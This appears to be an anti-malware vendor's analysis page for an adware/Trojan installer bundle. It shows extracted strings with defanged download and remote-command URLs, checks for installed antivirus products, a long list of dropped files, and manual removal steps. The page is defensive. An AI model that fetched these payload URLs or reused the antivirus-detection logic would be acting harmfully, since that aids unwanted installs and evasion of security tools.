422~hXXp://secured.cdnpmmm.us/os/rm/OfferScreen_422.zip~hXXp://VVV.djapp.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01#12~hXXp://secured.cdnpmmm.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
ttp://secured.cdnpmmm.us/os/rm/OfferScreen_422.zip~hXXp://VVV.djapp.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01#12~hXXp://secured.cdnpmmm.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
1245444
-1945828744
hXXp://VVV.fcesneim.us/FCL_htiw_qinu.php
hXXp://VVV.stsunsetwest.com/DS_Unq_trackstats_mon.php
hXXp://VVV.stsunsetwest.com/DSS_Unq_IMapplication_mon_remote_dcmd.php
\Program Files\Internet Explorer\iexplore.exe" -nohome
hXXp://VVV.stsunsetwest.com/DS_AdvAffiliateId.php
hXXp://secured.cdnpmmm.us/os/rm/OfferScreen_422.zip
hXXp://VVV.djapp.info/?file=bundle
hXXp://secured.cdnpmmm.us/os/rm/OfferScreen_12_HD.zip
B1|C*F*I,F4|Mail.Ru\Sputnik
KLM^Software\Microsoft\Windows\CurrentVersion\Uninstall^Opera,ER|HKCU^Software\Microsoft\Windows\CurrentVersion\Uninstall^Opera,DBNI|OtherthanIEDefault,RE2|Opera Software,RE3|Opera Software
689#B1|C*F*I,F4|Mail.Ru\Sputnik
ST,RE3|Microsoft\Windows\CurrentVersion\Uninstall\avast,RE3|VIPRE Antivirus,RE3|ESET,RE3|Malwarebytes' Anti-Malware,RE3|Avira,RE3|KasperskyLab,RE3|Norton,RE3|Fortinet\FortiClient,RE3|AVG,RE3S|Avira
Mail.Ru\Sputnik
F4|Mail.Ru\Sputnik
ft\Windows\CurrentVersion\Uninstall^Opera
6.189_2015-11-23_23:57:47
ffiliateId.php
mote_dcmd.php
OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy2.tmp\FirstResult.txt
89#B1|C*F*I,F4|Mail.Ru\Sputnik
tp://secured.cdnpmmm.us/os/rm/OfferScreen_12_HD.zip
17970.exe
w.djapp.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01
systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
re,RE3|Opera Software
cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
)-.Yln
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v11-Jul-2014.cvs</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>
hXXp://VVV.microsoft.com

%original file name%.exe_188_rwx_01955000_00001000:




kernel32.dll
USER32.dll
GDI32.dll
WINSPOOL.DRV
EnumPortsA
SHELL32.dll
ole32.dll
OLEAUT32.dll
COMCTL32.dll
VERSION.dll
ADVAPI32.dll

%original file name%.exe_188_rwx_01970000_00002000:




The procedure %s could not be located in the DLL %s.
The ordinal %d could not be located in the DLL %s.

%original file name%.exe_188_rwx_01B31000_00075000:




Invalid allocation size: %u bytes.
Client hook allocation failure at file %hs line %d.
_CrtCheckMemory()
_CrtIsValidHeapPointer(pUserData)
Allocation too large or negative: %u bytes.
Client hook re-allocation failure at file %hs line %d.
DAMAGE: after %hs block (#%d) at 0xX.
DAMAGE: before %hs block (#%d) at 0xX.
memory check error at 0xX = 0xX, should be 0xX.
%hs located at 0xX is %u bytes long.
%hs allocated at file %hs(%d).
DAMAGE: on top of Free block at 0xX.
Bad memory block found at 0xX.
_CrtMemCheckPoint: NULL state pointer.
_CrtMemDifference: NULL state pointer.
crt block at 0xX, subtype %x, %u bytes long.
normal block at 0xX, %u bytes long.
client block at 0xX, subtype %x, %u bytes long.
%hs(%d) :
#File Error#(%d) :
Data: <%s> %s
__MSVCRT_HEAP_SELECT
%s(%d) : %s
_CrtDbgReport: String too long or IO Error
Second Chance Assertion Failed: File %s, Line %d
user32.dll
Debug %s!
Program: %s%s%s%s%s%s%s%s%s%s%s
portuguese-brazilian
c:\%original file name%.exe
GetCPInfo
KERNEL32.dll
11111118
222222222
7777@@@@
2222222
222222222222
22222222222
2222222222
''''~~~~
777@7@@@
--$$#!!!!
7777777
111118111
22222222
FFFrCrTrTTTTTTTTTTTTTTTTTrTrTrrrrrrrFrrbFbbbFbbbbbbbbbbbbbbbbbooooooooooooooooo
!!##$$$$#
.....zzbF
...zzbFF)
0000000
11111111
1111111
|||:||||
,6,6,666
))):||||
2222222222222
222222222222222
):::||||
;{;{;;3;
{;{{;;{;
6,66,,,,
6,,666,,,
>>>///>///>>>
,6,,6,,,
>>/>//>/
>//>/>>>
///>>/>/>
#$)))'--'-..1/..1...,,. ',  (& &(,&&(,&,&(&,& ',&,(,&,,, ,046782
#!#&))-&--1'...   ,,,&&(,&&(& (,&'(,&'(&,&'&(&(&'&'&(&&',&,,0465
$#!)))'&--'*. (,(,,(,&(,&'(,&&(&',&&'&,'&',&,&,& (,&,& (,&,& &.5.
#$!)))-)-*-,&  & &'& (&&,&(',&&,&&',&'&,&(&'(&&(&&&'&(&(&(&'(,&,,
$$!#&)&&'& ,&&(&(,(,&& (&,& &',&',&',&'& ',&,&,&,(,&,&,& &,&,',& 
#$)!))&',&,&,',&,&'& (,&& &'&''&'&'&'&&&''&'&&'(&'&'&'(&'(&&'&&',&
$$!#*'*'* ,&&',&&'&&&&'"&&&&!&
!&&'&'(&(&&&'(&'&&'&'&((& &
#&&'&'&'&'&&&!&&!&
&&&',& &,(,&,&,(,&,&,& &(&
#!&&''!&&!&
!& (&(&(&'&'&&&'&'&((&'(& &
!)&,&&&!&
&'& &',&(,&,(,&,&,& &,&,(&
#!&&',&&&&!!
&&' ',&& &'&'&'(&'(&(&&'&'&
!& ,', (,&(,&,&,&,&,& (,&,&,
$!!)&& &',&''&&"!
!!)&!''.,//,/',&&'(&'(&&&'&(&(&'&'
!$!)'&- /,///.01021//,',&,&,&,',(,&,&,&,&&
'&&&&!&!$
$#!&))&.'./10/4222442420/, &'(&&'&(&'&&'&'&'(,&
&&'&'&/#
&&'"%"%!!
!&&"&&&"%&!%!$!$!))&'-. 1/22244447474442//'&,&,&,&,& (,&,&,&&'&'
)"&"&"&"'&"&&"&!&&&&---.//2224447464474420, (&'(&&'&(&&'&'(&',&,&
!&"'&&&,& &',06878787440 ,&,& &,(,& (,& (,&,& (,& 
!&&&'(,&(&(&& 478878470.,'&(&(&&'&(&(&('(&&&'(&'&(
&"'&(&(& &'&&/47787745 ',&,& (,&,&,& &,& (,&,&,&'
$'&&(&&&,&(&&&&.7877460 (&'&(&&'(&&'&(&&'(&'&&'&,&
&&'&&'(&&(&'&& .478854,,&,&,& (,& (,& (,&,&,(,&,&(
&'&,(& (,& &'&&,,68764,,&&'(&(&'&(&(&&(&(&&'&'(&'&
!)&'. /.,/ &(,&& &&',,0744.('(&'&&'&(&&'&'&(&(&&'&'(&'&
$!)&&- .,//2/// ,&&'(&,& &(,.40.,&'(&&'&'(&'(&(&&'&(&'(&'(&&'
#!&)'*. ../2//2, & (& &'&(& &,45 ((,& (,&,&,&,& (,&,&,&,&,& (&
#$!)&- . /10/2///'(&&&'(,&,&(,,.., '&(&(&(&'&(&'(&'(&'&(&&'(&,&
!#&)'. //1/02300, &&(,&&&'&',&,,,,&(,&,& &,',&,&,&,&,&,& (,&&'&
!)&- .,/010202/ '(&&&,(,&,&&',,&,&&&'&(&(&&&'&&'(&&'&'(&&& (,&
! ! !!&'- .0/102240.'(&&(&'&'(&(,&,',& (,&,& &,(,&,&,& (,&,& (,&&&'
! "!!&& //.202440.,,'(&&&(,& &'&(&'&(&&'&(&'(&''((&(&(&'(&('(&'(,&
" ! "!&& /.2024.440'&&&'&,&(&(,&,&,&,& (,&,&,&,&,& & &,&,&,& &,',&'
! "!"! !'/1244420,'&'&&&'(&&',&,&,& (,& (,&,&,&,& & &,(,&,&,& (,&,
'.42442, (&&(&(&(&,&&'&(&'(&'&(&&&'&&(&'(&(&&&'&&(&'(&'(&
"! !!!&/24445 &&'&&&'&&'(,&,&,&,&,&,& (,&,&,&,&,& (,&,&,&,&,& &
"! ! ! &,0472.'(&&&'(&(&(&'(&(&'&&&'&((&'((&'&&'&((&'((&'&&'&((&
! " "!"! " 0440,'&&&'&&&&(&',& &,',(,&,& &,& &,(,&,& &,& &,(,&,& &
"! " !&'.445''&'"&'(&&&&(&&(&(&&'&(&'((&'(&&'&(&'((&'(&&'&(&'(&
!! "! "!&"&,24.(&&&&'&'&(&(&(,& & (,& &,& &,& (,& &,& &,& (,& &,& 
!" ! ""& .5,'&"'"&&&'&'& &(&((&((&((&((&((&((&((&((&((&((&((&('
!"!&"&"'..,'&&&''&'&&'&',& & & & & & & & & & & & & & & & & & &
! &"   "&& &&'&&'&&'&'&'&'&'&'&'&'&'&'&'&'&'&'&'&'&'&'&'&'
&[[[[FKEEEC?953).ILSPPRRPSTVVWYYZZZ[[[[[[Q&
####'"""!
7<##''(,,-28!
##''((,-6!
33333333333330
@10550,10551;1;0;;0,128,128
Please insert the next disk, Disk %d. If the files on this disk can be found in another location, for example, in another drive, enter its full path or click the Browse button to select its path.
Enter the password required to run this setup. Please note that passwords are case sensitive. Click Next to continue.
Password
This setup has been password protected.
Enter the user name and password that should be used to log on.
&Password:
Specify a SQL Login ID and Password.
Database Server Login
Database server requires login credentials to continue.
&Login ID:
&Windows authentication
S&QL Server authentication using the Login ID and password below
@10550,10551;1;0;;0,128,128
c:\path\company\product\suite\version
@10553,10553;1;0;;0,128,128
Restarting Windows
c:\folder\company\product
A read only file, %s, was found while attempting to copy files to the destination location. To overwrite the file, click the Yes button, otherwise click the No button.
c:\path\company\product
&Let Setup modify the %s file.
&Save the required changes to %s file.
This text is modifed by the 'szMsg' parameter. You can reposition controls in this dialog and add static text fields.
Press the PAGE DOWN key to see the rest of the agreement.
%s of space required on the %s drive
%s of space available on the %s drive
Specify a user account and password.
Con&firm password:
YAn internal read error has occurred on %s. Unable to load setup instructions.
Error 703.L%s file has become corrupted. Unable to load setup instructions.
Setup has detected a possible infinite loop in the script with function %s. Make sure you are handling the error return codes properly.
Error 425.ESetup is unable to find the installation script file: %s
Error 426.ASetup is unable to load the installation script file.
]Setup is unable to copy the installation support file %s to a temporary location.
Setup is unable to copy the installation support file _SETUP.LIB to a temporary location. Make more space available and try again.
Error 421.GSetup is unable to expand the installation support file %s.
Setup is unable to load the installation script file: %s
%d %%oSetup has detected that unInstallShield is in use. Please close unInstallShield and restart setup.
Error 432.iAn attempt was made to access a structure with an invalid pointer. The setup will terminate.
SSetup is unable to initialize the installation program ( INSTALL.EXE ).
Error 201.CSetup is unable to initialize the installation program.
Error %d.
qUnable to write to response file '%s' during recording. Please ensure enough space is available on target drive.
Invalid mode..Required data not found in the Setup.iss file.
Please free up some disk space or modify your selections.gSetup is complete. You may run the installed program by double-clicking on the installed program icon.
Installing...0There is not enough space available on the disk.LPlease free up some space or change the target location to a different disk./This program requires VGA or better resolution.(Do you want to view the ReadMe file now?MGeneral file transfer error. Please check your target location and try again.
Copying program files...#Creating Program Group and Icons...$Setup program cannot modify file %s."Unable to create target folder %s. Please check write access to %s.
Unable to locate file %s.!Please select a different folder.
Keep the older version.?You may run setup at a later time to complete the installation.*Do you want to quit the setup program now?#Do you want to continue this setup?QIf you choose to continue, the setup program will overwrite the existing version.)The setup program failed to load file %s.dSetup program has successfully modified the %s file, and the old version of the file is saved as %s.$A version of %s is currently in use.2Please close all applications and run setup again.&Please select the installation folder.
Select the type of setup.RYou must quit all programs and restart your computer before using the application.
Error NumberFThe setup program cannot save the newly modified %s file back to disk.=A folder name cannot contain any of the following characters:
You may run the setup program at a later time to complete the operations.
Your system has not been modified. To install this program at a later time, please run the setup again.&Click Finish to exit the Setup wizard.YSelect the features you want to install, and deselect the features you want to uninstall.
CRC error: The file %s doesn't match the file in the setup's .cab file. The medium from which you are running the setup may be corrupted; contact your software vendor.9The following error occurred on the file '%s'.
%s (0x%x)
Locked file: %s
Click Postpone to change this file the next time you restart your computer; click Skip to leave this file unchanged.EUnable to locate the file %s on disk %d. Please select an operation.0Please insert disk %d that contains the file %s.
Read-only file: %s
Do you want InstallShield to modify this read-only file?bCannot add feature. FeatureAddItem was unable to add a feature to the script-created feature set.lSpecified feature already exists.
Specified feature cannot be deselected. FeatureSelectItem was called to deselect a feature required by a currently selected feature.pSpecified feature name is not valid.
The value passed in the second parameter of FeatureInitialize is not valid.
Attempted operation not allowed with script-created feature sets.
A script-created feature set name was passed to a feature function (for example, FeatureFileInfo) that operates only on file media.
When calling FeatureFileEnum, FeatureFileInfo, FeatureListItems, or FeatureSetupTypeEnum, verify that the list you are passing to the function is valid.
Attempted operation not allowed with file media library. A file media name was passed to a feature function (for example, FeatureAddItem) that operates only on script-created feature sets.nMedia is already initialized.
The file Data1.cab is corrupt, or the file specified in a call to FeatureInitialize is not an InstallShield-generated cabinet file.
Specified password does not match.
The specified password does not match the password stored in the specified file media library or feature.
Specified password cannot be found.
FeatureValidate was called to validate a feature or a file media library for which no password has been set.
The media or the feature password was not validated.
Invalid value passed to a feature-related function.
One of the values passed to a feature function is invalid. This error can be caused, for example, by passing an empty string in the second parameter of FeatureAddItem.xData cannot be read from the Internet.
This error occurs when using InstallFromTheWeb in conjunction with InstallShield.
This error occurs when using InstallFromTheWeb in conjunction with InstallShield. The Internet connection has been lost and cannot be reestablished by InstallFromTheWeb.
Cabinet file generated by an older version of InstallShield. Verify that the project was built with your most recent version of InstallShield. Verify that you are not using mismatched cabinet files generated by different versions of InstallShield.TUnable to decompress a file. An internal error occurred. Contact technical support.
The target disk or directory has insufficient free space; the disk space can not be determined because TARGETDIR is invalid; or a script-defined folder of a feature has not been set.VEnterDisk function called failed. Internal error occurred. Contact technical support.
Specified file cannot be opened as read-only. The file Data1.cab (or one of the other data cab files) is missing or corrupted; or an uncompressed data file is missing from a CD-ROM, Data As Files build.jSpecified file cannot be opened as read/write. Unable to append to split file. Contact technical support.
Unable to self-register a file properly. This error has many possible causes. For details, refer to article Q101538 in the InstallShield Knowledge Base.^Unable to update a shared file in FeatureMoveData. Internal error. Contact technical support.EUnable to write to a file.
Internal error. Contact technical support.
Error renaming a file. An attempt was made to transfer an executable file (an .exe or .com file) over a locked file without setting the Potentially Locked property to Yes.
Unknown Error.RDo you want to completely remove the selected application and all of its features?.Feature:
Shared file: %s
%d$Read-Only File Found - InstallShield
&Try AgainJResolution is equal to %d, this program requires VGA or better resolution.:The following files did not self-register or unregister:
Error : 0x%x
Unhandled Exception"Error Number: 0x%X
Description: %s
Removed0Specify the location of the file %s to continue.
Setup needs the file %s
Internal Failure"Error Number: 0x%X
KInstallShield Wizard has finished performing maintenance operations on %p.
DifferenceshThe InstallShield Patch Wizard will install the patch for %P on your computer. To continue, click Next.0Welcome to the InstallShield Patch Wizard for %PHAre you sure you want to completely remove '%s' and all of its features?CThe wizard was interrupted before %P could be completely installed.
InstallShield Wizard Completed.PNetwork Location
Enter the network location or browse to a location. Click Install to create a server image of %P or click Cancel to exit the wizard. Fatal error during installation.FConsult Windows Installer Help (Msi.chm) or MSDN for more information.(Resuming the InstallShield Wizard for %PVWizard will complete the installation of %P on your computer. To continue, click Next.
%s - InstallShield Wizard_The installed version of the application could not be determined. The setup will now terminate.]The current version of the application could not be determined. The setup will now terminate.<The version comparison failed. The setup will now terminate.
]The password you have entered is incorrect. You must enter the correct password to continue.
This setup requires Internet Information Server 4.0 or higher for configuring IIS Virtual Roots. Please make sure that you have IIS 4.0 or higher.uThe version of %s present does not meet this setup's minimum requirements. This installation requires %s %s or later..There was an error logging in to %s.
Error: %sZThere was an error running the SQL script %s. Setup will now terminate.
Line: %d
Error: %spThe SQL script '%s' could not be run because no valid connection to the server exists. Setup will now terminate.5SQL script support has not been properly initialized.HSupport for database server failed to initialize. Setup will terminate./There was an error detecting the version of %s.gBrowsing or connecting for database servers requires that MDAC be installed. Setup will now terminate.
This installation requires a Microsoft SQL Server. The specified server '%s' is a Microsoft SQL Server Desktop Engine or SQL Server Express.)The InstallShield Wizard is installing %P(The InstallShield Wizard is modifying %P(The InstallShield Wizard is repairing %P'The InstallShield Wizard is removing %P
(String %s was not found in string table.
Error loading NetApi32.DLL. The ISNetApi.dll needs to have NetApi32.DLL properly loaded and requires an NT based operating system.\Server not found. Verify that the specified server exists. The server name can not be empty.&Unspecified error from ISNetApiRT.dll.
Unhandled exception.,Invalid user name for this server or domain.*The case-sensitive passwords do not match.
Error getting group.SError adding user to group. Verify that the group exists for this domain or server.
Error creating user.<ERROR_NETAPI_ERROR_NOT_PRIMARY returned from ISNetApiRT.dll."The specified user already exists.#The specified group already exists.^Invalid password. Verify that the password is in accordance with your network password policy.
Invalid group.IThe user name can not be empty and must be in the format DOMAIN\Username.>Error loading or creating INI file in the user TEMP directory.
ISNetApiRT.dll is not loaded or there was an error loading the dll. This dll needs to be loaded for this operation. Verify that the dll is in the SUPPORTDIR directory.WError deleting INI file containing new user information from the user's TEMP directory.
2Error getting the primary domain controller (PDC).8Every field must have a value in order to create a user.QODBC driver for %s not found. This is required to connect to %s database servers.%Unable to initialize XML runtime .dll/Unexpected error updating XML files. Error: %dxThis setup requires MSXML 3.0 or higher for configuring XML files. Please make sure that you have version 3.0 or higher.%Error updating XML file %s. Error: %d$Error opening XML file %s. Error: %d
There was an error attempting to open connection %s. No valid database metadata associated with this connection. Setup will now terminate.ZThere was an error creating database %s. Setup will now terminate.
Server: %s %s
Error:%s`There was an error connecting to database %s. Setup will now terminate.
Error: %sjThere was an error retrieving schema version from %s %s. Setup will now terminate.
Database: %s
Error: %seThere was an error writing schema version to %s %s. Setup will now terminate.
Error: %szThere was an error attempting to run the SQL script %s. The SQL script file could not be opened. Setup will now terminate.LThere was an unexpected error running SQL scripts. Setup will now terminate.
There was an error loading %s. This file needs to be loaded for InstallShield SQL operation. Verify that the file is in the SUPPORTDIR directory. Setup will now terminate.UFrom the list of catalog names below, select the database catalog you like to target.

%original file name%.exe_188_rwx_01BBC000_00002000:




kernel32.dll
14.0.162
_IsRes.dll

%original file name%.exe_188_rwx_01BC0000_00002000:




The procedure %s could not be located in the DLL %s.
The ordinal %d could not be located in the DLL %s.

setup.exe_880_rwx_10004000_00001000:




callback%d






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
    2. 

  2. Delete the original Trojan file.
    3. 

  3. Delete or disinfect the following files created/modified by the Trojan:
    

    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\Offer2.zip (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\inner.png (146 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\blowfish.dll (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\DSS_Unq_IMapplication_mon_remote_dcmd[1].htm (620 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\OfferScreen_12.html (1681 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\Math.dll (2489 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\Offer1.zip (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\FirstResult.txt (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\registry.dll (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\SecondResult.txt (620 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\nsCBHTML5.dll (1660 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\nsisunz.dll (211 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\serlib.dll (16 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\img12_1.jpg (145 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\UserInfo.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\FCL_htiw_qinu[1].htm (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\OfferScreen_422.html (1969 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\header.bmp (1568 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\manlib.dll (26 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\GetVersion.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\nsDialogs.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\dotn1ba3.rra (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\DigiAqua_7598[1].exe (66929 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\DIFx1bd2.rra (87 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\isrt1c10.rra (7316 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\difx1c5f.rra (10582 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\Disk1\setup.ini (498 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\setup.ini (498 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Delta Tail Betta Wallpaper\UninstallDeltaTailBetta.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\setu1b74.rra (7348 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\setu294f.rra (4984 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\Stri1bd2.rra (791 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\Disk1\layout.bin (437 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\defa1c20.rra (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\Font1bc2.rra (40 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\Disk1\_Setup.dll (5520 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\Disk1\data1.hdr (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\_Setup.dll (2784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\{DDEF27CB-1234-106A-A265-901201505041}\_IsR1c3f.rra (4314 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{80DD1909-B742-43E5-B31C-3B1D8482FBF7}\core1ba3.rra (2334 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\Disk1\data1.cab (27704 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\Disk1\ISSetup.dll (18424 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{BD103CFA-FDE7-4FE7-BEC4-AE51FAE2EF13}\Disk1\setup.exe (12536 bytes)
    

    4. 

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    5. 

  5. Reboot the computer.
    6. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2026 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now